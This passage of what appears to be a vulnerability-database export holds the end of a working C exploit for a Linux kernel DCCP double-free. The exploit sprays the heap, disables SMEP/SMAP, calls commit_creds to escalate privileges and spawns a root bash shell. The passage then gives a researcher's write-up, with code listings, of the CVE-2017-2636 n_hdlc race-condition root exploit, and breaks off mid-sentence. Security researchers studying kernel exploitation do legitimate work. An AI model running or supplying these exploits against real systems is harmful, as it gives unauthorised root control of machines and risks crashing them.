timer->next = 0;\r\n timer->prev = 0;\r\n timer->expires = 4294943360;\r\n timer->function = func;\r\n timer->data = arg;\r\n timer->flags = 1;\r\n timer->slack = -1;\r\n}\r\n \r\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\r\n \r\nstruct dccp_handle {\r\n struct sockaddr_in6 sa;\r\n int s1;\r\n int s2;\r\n};\r\n \r\nvoid dccp_init(struct dccp_handle *handle, int port) {\r\n handle->sa.sin6_family = AF_INET6;\r\n handle->sa.sin6_port = htons(port);\r\n inet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr);\r\n handle->sa.sin6_flowinfo = 0;\r\n handle->sa.sin6_scope_id = 0;\r\n \r\n handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\r\n if (handle->s1 == -1) {\r\n perror(\"socket(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));\r\n if (rv != 0) {\r\n perror(\"bind()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n rv = listen(handle->s1, 0x9);\r\n if (rv != 0) {\r\n perror(\"listen()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n int optval = 8;\r\n rv = setsockopt(handle->s1, IPPROTO_IPV6, IPV6_RECVPKTINFO,\r\n &optval, sizeof(optval));\r\n if (rv != 0) {\r\n perror(\"setsockopt(IPV6_RECVPKTINFO)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\r\n if (handle->s1 == -1) {\r\n perror(\"socket(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid dccp_kmalloc_kfree(struct dccp_handle *handle) {\r\n int rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));\r\n if (rv != 0) {\r\n perror(\"connect(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid dccp_kfree_again(struct dccp_handle *handle) {\r\n int rv = shutdown(handle->s1, SHUT_RDWR);\r\n if (rv != 0) {\r\n perror(\"shutdown(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid dccp_destroy(struct dccp_handle *handle) {\r\n close(handle->s1);\r\n close(handle->s2);\r\n}\r\n \r\n// * * * * * * * * * * * * * * Heap spraying * * * * * * * * * * * * * * * * *\r\n \r\nstruct udp_fifo_handle {\r\n int fds[2];\r\n};\r\n \r\nvoid udp_fifo_init(struct udp_fifo_handle* handle) {\r\n int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, handle->fds);\r\n if (rv != 0) {\r\n perror(\"socketpair()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid udp_fifo_destroy(struct udp_fifo_handle* handle) {\r\n close(handle->fds[0]);\r\n close(handle->fds[1]);\r\n}\r\n \r\nvoid udp_fifo_kmalloc(struct udp_fifo_handle* handle, char *buffer) {\r\n int rv = send(handle->fds[0], buffer, 1536, 0);\r\n if (rv != 1536) {\r\n perror(\"send()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid udp_fifo_kmalloc_small(struct udp_fifo_handle* handle) {\r\n char buffer[128];\r\n int rv = send(handle->fds[0], &buffer[0], 128, 0);\r\n if (rv != 128) {\r\n perror(\"send()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid udp_fifo_kfree(struct udp_fifo_handle* handle) {\r\n char buffer[2048];\r\n int rv = recv(handle->fds[1], &buffer[0], 1536, 0);\r\n if (rv != 1536) {\r\n perror(\"recv()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nint timer_kmalloc() {\r\n int s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n if (s == -1) {\r\n perror(\"socket(SOCK_DGRAM)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n return s;\r\n}\r\n \r\n#define CONF_RING_FRAMES 1\r\nvoid timer_schedule(int handle, int timeout) {\r\n int optval = TPACKET_V3;\r\n int rv = setsockopt(handle, SOL_PACKET, PACKET_VERSION,\r\n &optval, sizeof(optval));\r\n if (rv != 0) {\r\n perror(\"setsockopt(PACKET_VERSION)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n struct tpacket_req3 tp;\r\n memset(&tp, 0, sizeof(tp));\r\n tp.tp_block_size = CONF_RING_FRAMES * getpagesize();\r\n tp.tp_block_nr = 1;\r\n tp.tp_frame_size = getpagesize();\r\n tp.tp_frame_nr = CONF_RING_FRAMES;\r\n tp.tp_retire_blk_tov = timeout;\r\n rv = setsockopt(handle, SOL_PACKET, PACKET_RX_RING,\r\n (void *)&tp, sizeof(tp));\r\n if (rv != 0) {\r\n perror(\"setsockopt(PACKET_RX_RING)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid socket_sendmmsg(int sock, char *buffer) {\r\n struct mmsghdr msg[1];\r\n \r\n msg[0].msg_hdr.msg_iovlen = 0;\r\n \r\n // Buffer to kmalloc.\r\n msg[0].msg_hdr.msg_control = &buffer[0];\r\n msg[0].msg_hdr.msg_controllen = 2048;\r\n \r\n // Make sendmmsg exit easy with EINVAL.\r\n msg[0].msg_hdr.msg_name = \"root\";\r\n msg[0].msg_hdr.msg_namelen = 1;\r\n \r\n int rv = syscall(__NR_sendmmsg, sock, msg, 1, 0);\r\n if (rv == -1 && errno != EINVAL) {\r\n perror(\"[-] sendmmsg()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid sendmmsg_kmalloc_kfree(int port, char *buffer) {\r\n int sock[2];\r\n \r\n int rv = socketpair(AF_LOCAL, SOCK_DGRAM, 0, sock);\r\n if (rv != 0) {\r\n perror(\"socketpair()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n socket_sendmmsg(sock[0], buffer);\r\n \r\n close(sock[0]);\r\n}\r\n \r\n// * * * * * * * * * * * * * * Heap warming * * * * * * * * * * * * * * * * *\r\n \r\nvoid dccp_connect_pad(struct dccp_handle *handle, int port) {\r\n handle->sa.sin6_family = AF_INET6;\r\n handle->sa.sin6_port = htons(port);\r\n inet_pton(AF_INET6, \"::1\", &handle->sa.sin6_addr);\r\n handle->sa.sin6_flowinfo = 0;\r\n handle->sa.sin6_scope_id = 0;\r\n \r\n handle->s1 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\r\n if (handle->s1 == -1) {\r\n perror(\"socket(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n int rv = bind(handle->s1, &handle->sa, sizeof(handle->sa));\r\n if (rv != 0) {\r\n perror(\"bind()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n rv = listen(handle->s1, 0x9);\r\n if (rv != 0) {\r\n perror(\"listen()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n handle->s2 = socket(PF_INET6, SOCK_DCCP, IPPROTO_IP);\r\n if (handle->s1 == -1) {\r\n perror(\"socket(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n rv = connect(handle->s2, &handle->sa, sizeof(handle->sa));\r\n if (rv != 0) {\r\n perror(\"connect(SOCK_DCCP)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n}\r\n \r\nvoid dccp_kmalloc_pad() {\r\n int i;\r\n struct dccp_handle handle;\r\n for (i = 0; i < 4; i++) {\r\n dccp_connect_pad(&handle, port++);\r\n }\r\n}\r\n \r\nvoid timer_kmalloc_pad() {\r\n int i;\r\n for (i = 0; i < 4; i++) {\r\n socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\r\n }\r\n}\r\n \r\nvoid udp_kmalloc_pad() {\r\n int i, j;\r\n char dummy[2048];\r\n struct udp_fifo_handle uh[16];\r\n for (i = 0; i < KMALLOC_PAD / 16; i++) {\r\n udp_fifo_init(&uh[i]);\r\n for (j = 0; j < 16; j++)\r\n udp_fifo_kmalloc(&uh[i], &dummy[0]);\r\n }\r\n}\r\n \r\nvoid kmalloc_pad() {\r\n debug(\"dccp kmalloc pad\");\r\n dccp_kmalloc_pad();\r\n debug(\"timer kmalloc pad\");\r\n timer_kmalloc_pad();\r\n debug(\"udp kmalloc pad\");\r\n udp_kmalloc_pad();\r\n}\r\n \r\nvoid udp_kmalloc_warm() {\r\n int i, j;\r\n char dummy[2048];\r\n struct udp_fifo_handle uh[16];\r\n for (i = 0; i < KMALLOC_WARM / 16; i++) {\r\n udp_fifo_init(&uh[i]);\r\n for (j = 0; j < 16; j++)\r\n udp_fifo_kmalloc(&uh[i], &dummy[0]);\r\n }\r\n for (i = 0; i < KMALLOC_WARM / 16; i++) {\r\n for (j = 0; j < 16; j++)\r\n udp_fifo_kfree(&uh[i]);\r\n }\r\n}\r\n \r\nvoid kmalloc_warm() {\r\n udp_kmalloc_warm();\r\n}\r\n \r\n// * * * * * * * * * * * * * Disabling SMEP/SMAP * * * * * * * * * * * * * * *\r\n \r\n// Executes func(arg) from interrupt context multiple times.\r\nvoid kernel_exec_irq(void *func, unsigned long arg) {\r\n int i;\r\n struct dccp_handle dh;\r\n struct udp_fifo_handle uh1, uh2, uh3, uh4;\r\n char dummy[2048];\r\n char buffer[2048];\r\n \r\n printf(\"[.] scheduling %p(%p)\\n\", func, (void *)arg);\r\n \r\n memset(&dummy[0], 0xc3, 2048);\r\n init_timer_buffer(&buffer[0], func, arg);\r\n \r\n udp_fifo_init(&uh1);\r\n udp_fifo_init(&uh2);\r\n udp_fifo_init(&uh3);\r\n udp_fifo_init(&uh4);\r\n \r\n debug(\"kmalloc pad\");\r\n kmalloc_pad();\r\n \r\n debug(\"kmalloc warm\");\r\n kmalloc_warm();\r\n \r\n debug(\"dccp init\");\r\n dccp_init(&dh, port++);\r\n \r\n debug(\"dccp kmalloc kfree\");\r\n dccp_kmalloc_kfree(&dh);\r\n \r\n debug(\"catch 1\");\r\n for (i = 0; i < CATCH_FIRST; i++)\r\n udp_fifo_kmalloc(&uh1, &dummy[0]);\r\n \r\n debug(\"dccp kfree again\");\r\n dccp_kfree_again(&dh);\r\n \r\n debug(\"catch 2\");\r\n for (i = 0; i < CATCH_FIRST; i++)\r\n udp_fifo_kmalloc(&uh2, &dummy[0]);\r\n \r\n int timers[CATCH_FIRST];\r\n debug(\"catch 1 -> timer\");\r\n for (i = 0; i < CATCH_FIRST; i++) {\r\n udp_fifo_kfree(&uh1);\r\n timers[i] = timer_kmalloc();\r\n }\r\n \r\n debug(\"catch 1 small\");\r\n for (i = 0; i < CATCH_AGAIN_SMALL; i++)\r\n udp_fifo_kmalloc_small(&uh4);\r\n \r\n debug(\"schedule timers\");\r\n for (i = 0; i < CATCH_FIRST; i++)\r\n timer_schedule(timers[i], 500);\r\n \r\n debug(\"catch 2 -> overwrite timers\");\r\n for (i = 0; i < CATCH_FIRST; i++) {\r\n udp_fifo_kfree(&uh2);\r\n udp_fifo_kmalloc(&uh3, &buffer[0]);\r\n }\r\n \r\n debug(\"catch 2 small\");\r\n for (i = 0; i < CATCH_AGAIN_SMALL; i++)\r\n udp_fifo_kmalloc_small(&uh4);\r\n \r\n printf(\"[.] waiting for the timer to execute\\n\");\r\n \r\n debug(\"wait\");\r\n sleep(1);\r\n \r\n printf(\"[.] done\\n\");\r\n}\r\n \r\nvoid disable_smep_smap() {\r\n printf(\"[.] disabling SMEP & SMAP\\n\");\r\n kernel_exec_irq((void *)NATIVE_WRITE_CR4, CR4_DESIRED_VALUE);\r\n printf(\"[.] SMEP & SMAP should be off now\\n\");\r\n}\r\n \r\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * * *\r\n \r\n// Executes func() from process context.\r\nvoid kernel_exec(void *func) {\r\n int i;\r\n struct dccp_handle dh;\r\n struct udp_fifo_handle uh1, uh2, uh3;\r\n char dummy[2048];\r\n char buffer[2048];\r\n \r\n printf(\"[.] executing %p\\n\", func);\r\n \r\n memset(&dummy[0], 0, 2048);\r\n init_skb_buffer(&buffer[0], func);\r\n \r\n udp_fifo_init(&uh1);\r\n udp_fifo_init(&uh2);\r\n udp_fifo_init(&uh3);\r\n \r\n debug(\"kmalloc pad\");\r\n kmalloc_pad();\r\n \r\n debug(\"kmalloc warm\");\r\n kmalloc_warm();\r\n \r\n debug(\"dccp init\");\r\n dccp_init(&dh, port++);\r\n \r\n debug(\"dccp kmalloc kfree\");\r\n dccp_kmalloc_kfree(&dh);\r\n \r\n debug(\"catch 1\");\r\n for (i = 0; i < CATCH_FIRST; i++)\r\n udp_fifo_kmalloc(&uh1, &dummy[0]);\r\n \r\n debug(\"dccp kfree again:\");\r\n dccp_kfree_again(&dh);\r\n \r\n debug(\"catch 2\");\r\n for (i = 0; i < CATCH_FIRST; i++)\r\n udp_fifo_kmalloc(&uh2, &dummy[0]);\r\n \r\n debug(\"catch 1 -> overwrite\");\r\n for (i = 0; i < CATCH_FIRST; i++) {\r\n udp_fifo_kfree(&uh1);\r\n sendmmsg_kmalloc_kfree(port++, &buffer[0]);\r\n }\r\n debug(\"catch 2 -> free & trigger\");\r\n for (i = 0; i < CATCH_FIRST; i++)\r\n udp_fifo_kfree(&uh2);\r\n \r\n debug(\"catch 1 & 2\");\r\n for (i = 0; i < CATCH_AGAIN; i++)\r\n udp_fifo_kmalloc(&uh3, &dummy[0]);\r\n \r\n printf(\"[.] done\\n\");\r\n}\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n \r\n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\r\n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\r\n \r\nvoid get_root_payload(void) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nvoid get_root() {\r\n printf(\"[.] getting root\\n\");\r\n kernel_exec(&get_root_payload);\r\n printf(\"[.] should be root now\\n\");\r\n}\r\n \r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n \r\nvoid exec_shell() {\r\n char *shell = \"/bin/bash\";\r\n char *args[] = {shell, \"-i\", NULL};\r\n execve(shell, args, NULL);\r\n}\r\n \r\nvoid fork_shell() {\r\n pid_t rv;\r\n \r\n rv = fork();\r\n if (rv == -1) {\r\n perror(\"fork()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (rv == 0) {\r\n exec_shell();\r\n }\r\n}\r\n \r\nbool is_root() {\r\n // We can't simple check uid, since we're running inside a namespace\r\n // with uid set to 0. Try opening /etc/shadow instead.\r\n int fd = open(\"/etc/shadow\", O_RDONLY);\r\n if (fd == -1)\r\n return false;\r\n close(fd);\r\n return true;\r\n}\r\n \r\nvoid check_root() {\r\n printf(\"[.] checking if we got root\\n\");\r\n \r\n if (!is_root()) {\r\n printf(\"[-] something went wrong =(\\n\");\r\n printf(\"[!] don't kill the exploit binary, the kernel will crash\\n\");\r\n return;\r\n }\r\n \r\n printf(\"[+] got r00t ^_^\\n\");\r\n printf(\"[!] don't kill the exploit binary, the kernel will crash\\n\");\r\n \r\n // Fork and exec instead of just doing the exec to avoid freeing\r\n // skbuffs and prevent crashes due to a allocator corruption.\r\n fork_shell();\r\n}\r\n \r\nstatic bool write_file(const char* file, const char* what, ...)\r\n{\r\n char buf[1024];\r\n va_list args;\r\n va_start(args, what);\r\n vsnprintf(buf, sizeof(buf), what, args);\r\n va_end(args);\r\n buf[sizeof(buf) - 1] = 0;\r\n int len = strlen(buf);\r\n \r\n int fd = open(file, O_WRONLY | O_CLOEXEC);\r\n if (fd == -1)\r\n return false;\r\n if (write(fd, buf, len) != len) {\r\n close(fd);\r\n return false;\r\n }\r\n close(fd);\r\n return true;\r\n}\r\n \r\nvoid setup_sandbox() {\r\n int real_uid = getuid();\r\n int real_gid = getgid();\r\n \r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n perror(\"unshare(CLONE_NEWUSER)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (unshare(CLONE_NEWNET) != 0) {\r\n perror(\"unshare(CLONE_NEWUSER)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n perror(\"write_file(/proc/self/set_groups)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n if (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\r\n perror(\"write_file(/proc/self/uid_map)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n if (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n perror(\"write_file(/proc/self/gid_map)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n cpu_set_t my_set;\r\n CPU_ZERO(&my_set);\r\n CPU_SET(0, &my_set);\r\n if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n perror(\"sched_setaffinity()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n if (system(\"/sbin/ifconfig lo up\") != 0) {\r\n perror(\"system(/sbin/ifconfig lo up)\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n printf(\"[.] namespace sandbox setup successfully\\n\");\r\n}\r\n \r\nint main() {\r\n setup_sandbox();\r\n \r\n#if SMEP_SMAP_BYPASS\r\n disable_smep_smap();\r\n#endif\r\n \r\n get_root();\r\n \r\n check_root();\r\n \r\n while (true) {\r\n sleep(100);\r\n }\r\n \r\n return 0;\r\n}\n ", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-92700"}, {"lastseen": "2017-11-19T12:01:12", "description": "This article discloses the exploitation of [CVE-2017-2636](https://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-2636), which is a race condition in the `n_hdlc` Linux kernel driver (`drivers/tty/n_hdlc.c`). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).\r\n\r\nThis driver provides `HDLC` serial line discipline and comes as a kernel module in many Linux distributions, which have `CONFIG_N_HDLC=m` in the kernel config. So [RHEL 6/7](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2017-2636), [Fedora](https://bugzilla.redhat.com/show_bug.cgi?id=1430049), [SUSE](https://bugzilla.novell.com/show_bug.cgi?id=CVE-2017-2636), [Debian](https://security-tracker.debian.org/tracker/CVE-2017-2636), and [Ubuntu](https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-2636.html) were affected by CVE-2017-2636.\r\n\r\nCurrently the flaw is [fixed](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) in the mainline Linux kernel ([public disclosure](http://seclists.org/oss-sec/2017/q1/569)). The bug was [introduced](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=be10eb7589337e5defbe214dae038a53dd21add8) quite a long time ago, so the patch is backported to the stable kernel versions too.\r\n\r\nI've managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn't cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts.\r\n\r\nMy PoC also doesn't defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel [attack](https://gruss.cc/files/prefetch.pdf) (see xairy's [implementation](https://github.com/xairy/kaslr-bypass-via-prefetch)).\r\n\r\nFirst of all let's watch the [demo video](https://youtu.be/nDCvRxWxN0Y)!\r\n\r\n\r\n## The n_hdlc bug\r\n\r\nInitially, `N_HDLC` line discipline used a self-made singly linked list for data buffers and had `n_hdlc.tbuf` pointer for buffer retransmitting after an error. It worked, but the commit `be10eb75893` added data flushing and introduced racy access to `n_hdlc.tbuf`.\r\n\r\nAfter tx error concurrent [`flush_tx_queue()`](http://lxr.free-electrons.com/ident?i=flush_tx_queue) and [`n_hdlc_send_frames()`](http://lxr.free-electrons.com/ident?i=n_hdlc_send_frames) both use `n_hdlc.tbuf` and can put one buffer to `tx_free_buf_list` twice. That causes an exploitable double-free error in [`n_hdlc_release()`](http://lxr.free-electrons.com/ident?i=n_hdlc_release). The data buffers are represented by `struct n_hdlc_buf` and allocated in the `kmalloc-8192` slab cache.\r\n\r\nFor fixing this bug, I [used](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=82f2341c94d270421f383641b7cd670e474db56b) a standard kernel linked list and got rid of racy `n_hdlc.tbuf`: in case of tx error the current `n_hdlc_buf` item is put after the head of `tx_buf_list`.\r\n\r\nI started the investigation when got a suspicious kernel crash from [syzkaller](https://github.com/google/syzkaller). It is a really great project, which helped to fix an [impressively big list](https://github.com/google/syzkaller/wiki/Found-Bugs) of bugs in Linux kernel.\r\n\r\n## Exploitation\r\n\r\nThis article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings!\r\n\r\n### Winning the race\r\n\r\nLet's look to the code of the main loop: going to race till success.\r\n\r\n```\r\nfor (;;) {\r\n\tlong tmo1 = 0;\r\n\tlong tmo2 = 0;\r\n\r\n\tif (loop % 2 == 0)\r\n\t\ttmo1 = loop % MAX_RACE_LAG_USEC;\r\n\telse\r\n\t\ttmo2 = loop % MAX_RACE_LAG_USEC;\r\n```\r\n\r\nThe `loop` counter is incremented every iteration, so `tmo1` and `tmo2` variables are changing too. They are used for making lags in the racing threads, which:\r\n\r\n1. synchronize at the `pthread_barrier`,\r\n2. spin the specified number of microseconds in a busy loop,\r\n3. interact with `n_hdlc`.\r\n\r\nSuch a way of colliding threads helps to hit the race condition earlier.\r\n\r\n```\r\n\tptmd = open(\"/dev/ptmx\", O_RDWR);\r\n\tif (ptmd < 0) {\r\n\t\tperror(\"[-] open /dev/ptmx\");\r\n\t\tgoto end;\r\n\t}\r\n\r\n\tret = ioctl(ptmd, TIOCSETD, &ldisc);\r\n\tif (ret < 0) {\r\n\t\tperror(\"[-] TIOCSETD\");\r\n\t\tgoto end;\r\n\t}\r\n```\r\n\r\nHere we open a pseudoterminal master and slave pair and set the `N_HDLC` line discipline for it. For more information about that, see `man ptmx`, [`Documentation/serial/tty.txt`](http://lxr.free-electrons.com/source/Documentation/serial/tty.txt) and [this](https://unix.stackexchange.com/questions/117981/what-are-the-responsibilities-of-each-pseudo-terminal-pty-component-software) great discussion about `pty` components.\r\n\r\nSetting `N_HDLC` ldisc for a serial line causes the `n_hdlc` kernel module autoloading. You can get the same effect using `ldattach` daemon.\r\n\r\n```\r\n\tret = ioctl(ptmd, TCXONC, TCOOFF);\r\n\tif (ret < 0) {\r\n\t\tperror(\"[-] TCXONC TCOOFF\");\r\n\t\tgoto end;\r\n\t}\r\n\r\n\tbytes = write(ptmd, buf, TTY_BUF_SZ);\r\n\tif (bytes != TTY_BUF_SZ) {\r\n\t\tprintf(\"[-] write to ptmx (bytes)\\n\");\r\n\t\tgoto end;\r\n\t}\r\n```\r\n\r\nHere we suspend the pseudoterminal output (see `man tty_ioctl`) and write one data buffer. The `n_hdlc_send_frames()` fails to send this buffer and saves its address in `n_hdlc.tbuf`.\r\n\r\nWe are ready for the race. Start two threads, which are allowed to run on all available CPU cores:\r\n\r\n* thread 1: flush the data with `ioctl(ptmd, TCFLSH, TCIOFLUSH)`;\r\n* thread 2: start the suspended output with `ioctl(ptmd, TCXONC, TCOON)`.\r\n\r\nIn a lucky case, they both put the only written buffer pointed by `n_hdlc.tbuf` to `tx_free_buf_list`.\r\n\r\nNow we return to the CPU 0 and trigger possible double-free error:\r\n\r\n```\r\n\tret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);\r\n\tif (ret != 0) {\r\n\t\tperror(\"[-] sched_setaffinity\");\r\n\t\tgoto end;\r\n\t}\r\n\r\n\tret = close(ptmd);\r\n\tif (ret != 0) {\r\n\t\tperror(\"[-] close /dev/ptmx\");\r\n\t\tgoto end;\r\n\t}\r\n```\r\n\r\nWe close the pseudoterminal master. The `n_hdlc_release()` goes through `n_hdlc_buf_list` items and frees the kernel memory used for data buffers. Here the possible double-free error happens.\r\n\r\nThis particular bug is successfully detected by the Kernel Address Sanitizer ([KASAN](https://lwn.net/Articles/612153/)), which reports the use-after-free happening just before the second `kfree()`.\r\n\r\nThe final part of the main loop:\r\n\r\n```\r\n\tret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);\r\n\tif (ret != EXIT_SUCCESS)\r\n\t\tgoto end;\r\n\r\n\tif (getuid() == 0 && geteuid() == 0) {\r\n\t\tprintf(\"[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\\n\",\r\n\t\t\t\t\t\tloop, tmo1, tmo2);\r\n\t\tbreak; /* :) */\r\n\t}\r\n\r\n\tloop++;\r\n}\r\n\r\nprintf(\"[+] finish as: uid=0, euid=0, start sh...\\n\");\r\nrun_sh();\r\n```\r\n\r\nHere we try to exploit the double-free error by overwriting `struct sk_buff`. In case of success, we exit from the main loop and run the root shell in the child process using `execve()`.\r\n\r\n### Exploiting the sk_buff\r\n\r\nAs I mentioned, the doubly freed `n_hdlc_buf` item is allocated in the `kmalloc-8192` slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects:\r\n\r\n* one containing some function pointer,\r\n* another one with the controllable payload, which can overwrite that pointer.\r\n\r\nSearching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I've chosen `sk_buff` with its `destructor_arg` in `struct skb_shared_info`. This approach is not new \u2013 consider reading the cool write-up about [CVE-2016-2384](https://xairy.github.io/blog/2016/cve-2016-2384).\r\n\r\nThe network-related buffers in Linux kernel are represented by `struct sk_buff`. See [these](http://vger.kernel.org/~davem/skb_data.html) great pictures describing `sk_buff` data layout. The most important for us is that the network data and `skb_shared_info` are placed in the same kernel memory block pointed by `sk_buff.head`. So creating a 7500-byte network packet in the userspace will make `skb_shared_info` be allocated in the `kmalloc-8192` slab cache. Exactly like we want.\r\n\r\nBut there is one challenge: `n_hdlc_release()` frees 13 `n_hdlc_buf` items straight away. At first I was trying to do the heap spray in parallel with `n_hdlc_release()`, but didn't manage to inject the corresponding `kmalloc()` between the needed `kfree()` calls. So I used another way: spraying **after** `n_hdlc_release()` can give two `sk_buff` items with the `head` pointing to the same memory. That's promising.\r\n\r\nSo we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I've created a lot of sockets using `socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)`:\r\n\r\n* one client socket for sending UDP packets,\r\n* one dedicated server socket, which is likely to receive two packets with the same `sk_buff.head`,\r\n* 200 server sockets for receiving other packets emitted during heap spray,\r\n* 200 server sockets for receiving the packets emitted during slab exhaustion.\r\n\r\nOk. Now we need another kernel object for overwriting the function pointer in `skb_shared_info.destructor_arg`. We can't use `sk_buff.head` for that again, because `skb_shared_info` is placed at the same offset in `sk_buff.head` and we don't control it. I was really happy to find that `add_key` syscall is able to allocate the controllable data in the `kmalloc-8192` too.\r\n\r\nBut I became upset when encountered key data quotas in `/proc/sys/kernel/keys/` owned by root. The default value of `/proc/sys/kernel/keys/maxbytes` is 20000\\. It means that only 2 `add_key` syscalls can concurrently store our 8 kB payload in the kernel memory, and that's not enough.\r\n\r\nBut the happiness returned when I encountered the bright idea at the [slides](https://speakerdeck.com/retme7/talk-is-cheap-show-me-the-code) of Di Shen from [Keen Security Lab](http://keenlab.tencent.com/en/): I can make the heap spray successful even if `add_key` fails!\r\n\r\nSo, let's look at the `init_payload()` code:\r\n\r\n```\r\n#define MMAP_ADDR\t\t0x10000lu\r\n#define PAYLOAD_SZ\t\t8100\r\n#define SKB_END_OFFSET\t\t7872\r\n#define KEY_DATA_OFFSET\t\t18\r\n\r\nint init_payload(char *p)\r\n{\r\n\tstruct skb_shared_info *info = (struct skb_shared_info *)(p +\r\n\t\t\t\t\tSKB_END_OFFSET - KEY_DATA_OFFSET);\r\n\tstruct ubuf_info *uinfo_p = NULL;\r\n```\r\n\r\nThe definition of `struct skb_shared_info` and `struct ubuf_info` is copied to the exploit code from [`include/linux/skbuff.h`](http://lxr.free-electrons.com/source/include/linux/skbuff.h) kernel header.\r\n\r\nThe payload buffer will be passed to `add_key` as a parameter, and the data which we put there at `7872 - 18 = 7854` byte offset will exactly overwrite `skb_shared_info`.\r\n\r\n```\r\n\tchar *area = NULL;\r\n\tvoid *target_addr = (void *)(MMAP_ADDR);\r\n\r\n\tarea = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,\r\n\t\t\tMAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n\tif (area != target_addr) {\r\n\t\tperror(\"[-] mmap\\n\");\r\n\t\treturn EXIT_FAILURE;\r\n\t}\r\n\r\n\tuinfo_p = target_addr;\r\n\tuinfo_p->callback = (uint64_t)root_it;\r\n\r\n\tinfo->destructor_arg = (uint64_t)uinfo_p;\r\n\tinfo->tx_flags = SKBTX_DEV_ZEROCOPY;\r\n```\r\n\r\nThe `ubuf_info.callback` is called in [`skb_release_data()`](http://lxr.free-electrons.com/ident?i=skb_release_data) if `skb_shared_info.tx_flags` has `SKBTX_DEV_ZEROCOPY` flag set to 1\\. In our case, `ubuf_info` item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.\r\n\r\nAnyway, now the `callback` points to `root_it()`, which does the classical `commit_creds(prepare_kernel_cred(0))`. However, this 